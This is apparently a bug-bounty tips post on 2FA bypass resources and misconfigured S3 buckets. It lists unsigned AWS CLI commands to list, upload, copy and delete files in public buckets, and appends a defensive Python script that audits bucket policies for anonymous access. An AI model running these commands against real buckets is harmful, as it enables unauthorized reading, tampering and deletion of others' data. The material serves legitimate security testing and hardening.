Day 26 comes with a pretty good resource on bypassing 2FA and part 2 on S3 bucket misconfigurations!
2FA Bypass Resource
From Rajesh Ranjan. I have shared a link to a writeup in which a researcher has shared some different techniques to bypass 2FA.
S3 Misconfiguration Part 2
From Sam (CoffeeJunkie). As we talked about in part 1, once you have the AWS KEYS, you can configure the keys in your terminal with the following command.
Once you type the command, it will start asking you for your Access Key ID and AWS Secret Access Key.
In order to check for vulnerable S3 buckets once you have the endpoints, you can type the following command.
aws s3 ls s3://[s3-bucket-link] --no-sign-request
After you’re on track, there are a couple of commands that you can try to read files or move files.
# Read files
aws s3 ls s3://[s3-bucket-link] --no-sign-request
# Move file
aws s3 mv yourfile s3://[s3-bucket-link]/test-file.txt --no-sign-request
# Copy files
aws s3 cp test.svg s3://[s3-bucket-link]/test.svg --no-sign-request
# Delete files
aws s3 rm s3://[s3-bucket-link]/test.svg --no-sign-request
And that’s it! I hope you find a legal and vulnerable target to try this out.
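From the bucket owner's side, each unsigned call above succeeds only when the bucket's policy or ACL grants the matching S3 action to an anonymous principal. The following added example (not part of the original tips; the function names, sample policy, bucket name, account ID and CIDR are constructed) audits a bucket policy document for statements that would let those calls through.

```python
import fnmatch
import json

# The unsigned CLI calls from the text and the S3 permission each one needs.
CLI_TO_ACTION = {"ls": "s3:ListBucket", "cp (download)": "s3:GetObject",
                 "cp/mv (upload)": "s3:PutObject", "rm": "s3:DeleteObject"}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _is_anonymous(principal):
    # "*" or {"AWS": "*"} covers every caller, including unsigned requests.
    aws = principal.get("AWS", []) if isinstance(principal, dict) else principal
    return "*" in _as_list(aws)

def _grants(statement, action):
    # IAM action names are case-insensitive and allow "*" / "?" wildcards.
    patterns = _as_list(statement.get("Action", []))
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)

def anonymous_exposure(policy_json):
    """Map each CLI call to the Allow statements that open it to unsigned callers."""
    # Entry = (sid, resources, conditional). Deny, NotAction, ACLs and Block
    # Public Access are not evaluated, so treat results as items to review.
    findings = {op: [] for op in CLI_TO_ACTION}
    for index, st in enumerate(_as_list(json.loads(policy_json).get("Statement", []))):
        if st.get("Effect") != "Allow" or not _is_anonymous(st.get("Principal")):
            continue
        entry = (st.get("Sid", f"statement[{index}]"),
                 _as_list(st.get("Resource", [])), "Condition" in st)
        for op, action in CLI_TO_ACTION.items():
            if _grants(st, action):
                findings[op].append(entry)
    return findings

# Constructed sample policy; bucket name, account ID and CIDR are placeholders.
SAMPLE_POLICY = json.dumps({"Statement": [
    {"Sid": "PublicList", "Effect": "Allow", "Principal": "*",
     "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::example-bucket"},
    {"Sid": "PublicWrite", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:Put*", "s3:DeleteObject"], "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "OfficeOnlyRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*",
     "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}}},
    {"Sid": "AppRole", "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::111122223333:role/app"},
     "Action": "s3:*", "Resource": "arn:aws:s3:::example-bucket/*"},
]})

if __name__ == "__main__":
    print(json.dumps(anonymous_exposure(SAMPLE_POLICY), indent=2))
```

Statements flagged with `conditional` set to true, such as the IP-restricted read in the sample, are not open to everyone but still deserve a look at how tight the condition is.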